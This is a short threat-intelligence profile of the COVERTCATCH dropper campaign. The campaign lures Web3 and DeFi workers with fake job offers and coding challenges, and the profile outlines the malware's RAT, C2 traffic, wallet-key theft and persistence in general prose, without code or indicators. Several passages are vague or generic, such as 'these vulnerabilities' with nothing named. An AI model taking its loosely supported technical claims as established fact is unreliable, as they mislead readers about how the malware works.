COVERTCATCH (Dropper) – Malware

Overview

The COVERTCATCH campaign is a sophisticated and stealthy cybercriminal operation that has been actively targeting individuals and organizations involved in Web3 technologies, including cryptocurrency exchanges and decentralized finance (DeFi) projects. The campaign is notable for its use of social engineering tactics, specifically leveraging fake job recruitment efforts to deliver malware. This method allows threat actors to gain initial access to targeted systems, setting the stage for later stages of infiltration that can involve the theft of sensitive data and digital assets. COVERTCATCH malware, disguised as innocent-looking coding challenges or job-related documents, is often delivered via platforms like LinkedIn, where attackers engage potential victims in convincing conversations before deploying malicious payloads.

Targets

Individuals

Finance and Insurance

Information

How they operate

Upon execution, the malware establishes an initial foothold by exploiting these vulnerabilities to drop additional payloads. One of the primary techniques used by COVERTCATCH is the deployment of a remote access Trojan (RAT) that provides the attackers with full control over the compromised system. This RAT is capable of bypassing security measures such as antivirus software and firewalls by using obfuscation techniques. COVERTCATCH malware often operates in a manner that avoids detection by traditional security tools, such as encrypting its communications or using polymorphic code to change its appearance with each infection. This makes it difficult for both users and automated security systems to identify and neutralize the threat quickly.

Once installed, the COVERTCATCH malware establishes communication with a command-and-control (C2) server, typically located on the dark web. The C2 server allows the attackers to issue commands, upload additional malicious tools, and exfiltrate sensitive information from the infected machine. One of the key objectives of the malware is to harvest valuable data, including credentials and private keys related to cryptocurrency wallets and decentralized finance (DeFi) platforms. The attackers use this information to gain access to digital assets and initiate unauthorized transfers. In some instances, the malware is designed to target specific Web3 infrastructure, such as cloud environments or decentralized exchanges, further enhancing the attack’s effectiveness.

To ensure persistence and avoid detection, the COVERTCATCH malware often includes rootkit-like capabilities that enable it to remain hidden within the system even after reboot. Additionally, it can disable system security tools, monitor network traffic for signs of detection, and self-update to counteract efforts to remove it. The malware can also create encrypted tunnels to maintain secure communication with its C2 server, making it difficult for defenders to block or trace these interactions. This sophisticated, layered approach ensures that COVERTCATCH remains a persistent threat in the Web3 ecosystem, capable of executing long-term operations with minimal chances of being caught. The technical expertise behind the COVERTCATCH campaign demonstrates the evolving nature of cyber threats targeting high-value targets within the cryptocurrency and blockchain sectors.

References

• DeFied Expectations — Examining Web3 Heists